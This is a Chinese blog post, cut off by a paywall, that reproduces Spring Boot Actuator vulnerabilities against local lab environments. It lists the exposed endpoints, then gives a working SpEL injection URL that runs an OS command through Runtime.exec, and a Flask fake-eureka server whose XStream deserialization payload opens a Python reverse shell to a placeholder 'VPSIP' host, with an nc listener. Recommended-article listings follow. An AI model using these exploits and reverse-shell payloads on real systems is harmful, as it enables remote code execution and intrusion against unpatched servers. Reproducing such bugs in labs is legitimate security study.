Spring Boot Actuator 漏洞复现合集

最新推荐文章于 2024-04-11 15:51:31 发布
VIP文章 最新推荐文章于 2024-04-11 15:51:31 发布
阅读量1.7k 收藏 4
点赞数 1
分类专栏: 面试 学习路线 阿里巴巴 文章标签: android 前端 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54850467/article/details/126114075
版权

前言

Spring Boot Actuator 未授权访问漏洞在日常的测试中还是能碰到一些的,这种未授权在某些情况下是可以达到RCE的效果的,所以还有有一定价值的,下面就是对这一系列漏洞复现。

基本上就是参考这篇文章的做的复现:

LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list (github.com)

Spring Boot Actuator简介

Spring Boot Actuator端点通过 JMX 和HTTP 公开暴露给外界访问,大多数时候我们使用基于HTTP的Actuator端点,因为它们很容易通过浏览器、CURL命令、shell脚本等方式访问。

一些有用的执行器端点是:

Spring Boot Actuator未授权访问

/dump - 显示线程转储(包括堆栈跟踪)
/autoconfig - 显示自动配置报告
/configprops - 显示配置属性
/trace - 显示最后几条HTTP消息(可能包含会话标识符)
/logfile - 输出日志文件的内容
/shutdown - 关闭应用程序
/info - 显示应用信息
/metrics - 显示当前应用的’指标’信息
/health - 显示应用程序的健康指标
/beans - 显示Spring Beans的完整列表
/mappings - 显示所有MVC控制器映射
/env - 提供对配置环境的访问
/restart - 重新启动应用程序
  • Spring Boot Actuator 1.x 版本默认内置路由的起始路径为 / ,2.x 版本则统一以 /actuator 为起始路径
  • Spring Boot Actuator 默认的内置路由名字,如 /env 有时候也会被程序员修改,比如修改成 /appenv

whitelabel error page SpEL RCE

1 影响版本:

  • 影响版本:
    1.1.0-1.1.12
    1.2.0-1.2.7
    1.3.0

2 漏洞原理:

  • 利用条件是使用了springboot的默认错误页(Whitelabel Error Page)

  1. spring boot 处理参数值出错,流程进入 org.springframework.util.PropertyPlaceholderHelper 类中

  2. 此时 URL 中的参数值会用 parseStringValue 方法进行递归解析

  3. 其中 ${} 包围的内容都会被 org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞

3 验证检测方法:

步骤一:找到一个正常传参处

比如发现访问 /article ,页面会报状态码为 500 的错误: Whitelabel Error Page

image-20211125105128725

步骤二:执行 SpEL 表达式

输入 /article?id=${7*7} ,如果发现报错页面将 7*7 的值 49 计算出来显示在报错页面上,那么基本可以确定目标存在 SpEL 表达式注入漏洞。

image-20211125104910358

4 利用方法:

由字符串格式转换成 0x** java 字节形式,方便执行任意代码:

# author: Zeo
# python: 3.7 
# software: PyCharm

"""
文件说明:转换字节码
"""
# coding: utf-8

result = ""
target = 'open -a Calculator'
for x in target:
    result += hex(ord(x)) + ","
print(result.rstrip(','))

正常访问:

http://127.0.0.1:9091/article?id=66

执行 open -a Calculator 命令:

http://127.0.0.1:8080/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}

image-20211125105005884

漏洞环境搭建:

https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce

eureka xstream deserialization RCE

1 利用条件:

  • 可以 POST 请求目标网站的 /env 接口设置属性
  • 可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)
  • 目标使用的 eureka-client < 1.8.7(通常包含在 spring-cloud-starter-netflix-eureka-client 依赖中)
  • 目标可以请求攻击者的 HTTP 服务器(请求可出外网)

2 漏洞原理:

  1. eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL 地址
  2. refresh 触发目标机器请求远程 URL,提前架设的 fake eureka server 就会返回恶意的 payload
  3. 目标机器相关依赖解析 payload,触发 XStream 反序列化,造成 RCE 漏洞

3 漏洞环境:

repository/springboot-eureka-xstream-rce

4 漏洞复现

正常访问:

http://127.0.0.1:9093/env

image-20211202103040953

发现存在所需的依赖

nc 监听端口,等待反弹 shell

image-20211202104656362

架设响应恶意 XStream payload 的网站

运行恶意脚本,并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号

#!/usr/bin/env python
# coding: utf-8
# -**- Author: LandGrey -**-

from flask import Flask, Response

app = Flask(__name__)


@app.route('/', defaults={'path': ''})
@app.route('/<path:path>', methods=['GET', 'POST'])
def catch_all(path):
    xml = """<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
                       <string>/bin/bash</string>
                       <string>-c</string>
                       <string>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("VPSIP",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
最低0.47元/天 解锁文章
m0_54850467
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
上传漏洞总结(私人珍藏)
12-31
好东西和大家分享啦,私人珍藏宝贝,全部上传漏洞总结。
Spring boot actuator端点启用和暴露
热门推荐
OceanSky的专栏
11-13 4万+
1.启用端点 默认情况下,除了shutdown端点是关闭的,其它的都是启用的。配置一个端点的启用,使用management.endpoint..enabled属性,下面的例子是启用shutdown端点: management.endpoint.shutdown.enabled=true 如果你个人更喜欢自定义端点的启用和关闭,可以使用如下属性 management.endpoints.enabl...
服务监控 SpringBoot Actuator
qq_29799655的博客
05-16 984
目录一. SpringBoot Actuator 基础二. SpringBoot Actuator 基础actuator暴露的端点解释及设置SpringBoot 2.0版本与暴露端点注意点与配置自定义管理服务器地址配置管理特定SSLActuatorSpring Boot 1.X 和Spring Boot 2.X 的差异health 健康信息端点详解info 端点详解 一. SpringBoot Actuator 基础 SpringBoot Actuator是什么: 服务指标监控工具,可以实现对服务内
Apache Solr 信息泄漏漏洞(含批量验证poc)_apache solr信息泄露(2)
最新发布
2401_83974227的博客
04-11 192
Apache Solr 是一款开源的搜索引擎,在Apache Solr 受影响版本中,由于 Solr Metrics API 默认输出所有未单独配置保护策略的环境变量。在默认无认证或具有metrics-read权限的情况下,攻击者可以通过向 /solr/admin/metrics 端点发送恶意请求,从而获取到运行 Solr 实例的主机上的所有系统环境变量,包括敏感信息的配置、密钥等。
bootstrap框架漏洞_学生会私房菜【202008011期】Apache Shiro 1.2.4反序列化漏洞
weixin_39653733的博客
11-27 1421
学生会私房菜学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题。本期文档内容为:《Apache Shiro 1.2.4反序列化漏洞》作者介绍:Chow一名来自网络工程专业的安全爱好者,目前在国科学习安全课程,同时也在国科安全团体进行安全的实战练习,本次分享的内容是CVE-2016-4437的漏洞,希望可以帮助大家更好理解这个漏洞。0x00简介Apa...
SpringBoot Actuator RCE 漏洞总结
渗透测试研究中心
03-01 2904
一、SpringBoot env 获取* 敏感信息当我们直接访问 springboot 站点时,可以看到某些 password 字段填充了*通过${name} 可以获取明文字段 2. 配置不当导致敏感信息泄露(password 打星号,而 pwd 没有打星号)参考https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA具体实现过程:例如: 我...
Spring Boot Actuator实现应用监控
YIYIYI
06-30 1285
Spring Boot Actuator实现应用监控
域渗透综合项目实战
干铮的博客
02-27 3969
1.项目网络拓扑 2.信息收集 netdiscover主机发现 sudo netdiscover -i eth0 -r 192.168.3.0/24 Nmap端口扫描 nmap -A 192.168.3.45 -p- -oN nmap.a
springboot actuator:开放全部(部分)端点端点映射、端点保护
weixin_43522117的博客
11-09 916
目前springboot默认暴露“/actuator、/health”端点
bootstrap通用漏洞_Nexus Repository UserComponent远程代码执行漏洞浅析
weixin_39640687的博客
01-04 2509
更多全球网络安全资讯尽在邑安全简介Nexus Repository OSS是一款通用的软件包仓库管理(Universal Repository Manager)服务。Sonatype Nexus Repository Manager 3中的涉及漏洞的接口为/service/extdirect,接口需要管理员账户权限进行访问。该接口中处理请求时的UserComponent对象的注解的校验中...
Spring Boot 知识集锦之actuator监控端点详解
日拱一卒无有尽,功不唐捐终入海
08-15 1666
背景: 一直零散的使用着Spring Boot 的各种组件和特性,从未系统性的学习和总结,本次借着这个机会搞一波。共同学习,一起进步。哈哈Spring Boot Actuator 是一个强大的监控和管理框架,它提供了一系列的监控端点,可以用于获取应用程序的状态、度量指标、健康检查、配置信息等。Actuator 的监控端点可以通过 HTTP 请求访问,并返回有关应用程序运行时信息的响应。使用 Actuator 可以方便地了解应用程序的运行状况,监控关键指标,并根据需要采取相应的措施。
Spring Boot Actuator执行器运行原理详解
08-24
主要介绍了Spring Boot Actuator执行器运行原理详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Spring Boot Actuator端点相关原理解析
08-18
主要介绍了Spring Boot Actuator端点相关原理解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Spring Boot Actuator监控端点小结
08-30
主要介绍了Spring Boot Actuator监控端点小结,需要的朋友可以参考下
springboot 使用Spring Boot Actuator监控应用小结
08-28
本篇文章主要介绍了springboot 使用Spring Boot Actuator监控应用小结,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Spring Boot Actuator监控器配置及使用解析
08-18
主要介绍了Spring Boot Actuator监控器配置及使用解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
bootstrap漏洞_漏洞复现环境集锦Vulhub
weixin_39671509的博客
11-28 2989
0x01 Vulhub简介 Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。0x02 安装# 安装pipcurl -shttps://bootstrap.pypa.io/get-pip.py| python3# 安装最新版dockercurl -shttps://get.docker.com/| sh# ...
SpringBoot监控原理、actuator、设置端点
m0_45877477的博客
07-05 739
actuator 能获取数据 actuator 开放了若干端点,每个端点又会给你信息
bootstrap漏洞_ActiveMQ任意文件写入漏洞(CVE20163088)复现
weixin_39992312的博客
11-27 1511
漏洞详情漏洞说明#Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fi...
Spring Boot Actuator未授权访问漏洞
05-24
Spring Boot ActuatorSpring Boot提供的一组用于监控和管理应用程序的端点。这些端点包括/health、/info、/metrics等,通过HTTP请求可以获取应用程序的相关信息。 未授权访问漏洞是指攻击者可以通过发送特定的请求,获取到未经授权的应用程序信息。在Spring Boot Actuator中,如果未对端点进行正确的安全配置,攻击者可以通过发送GET请求,获取到应用程序的敏感信息,如应用程序版本、运行状态、数据库连接信息等。 为了避免Spring Boot Actuator未授权访问漏洞的发生,可以采取以下措施: 1. 禁用不必要的Actuator端点:可以通过配置文件或注解的方式禁用不必要的Actuator端点,避免敏感信息的泄露。 2. 对Actuator端点进行安全配置:可以通过配置文件或代码的方式对Actuator端点进行安全配置,只允许授权用户进行访问。 3. 更新Spring Boot版本:Spring Boot官方已经修复了Actuator未授权访问漏洞,升级到最新版本可以避免此漏洞的发生。 总之,Spring Boot Actuator未授权访问漏洞需要引起开发人员的重视,应该及时采取相应的安全措施,避免应用程序的敏感信息被泄露。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值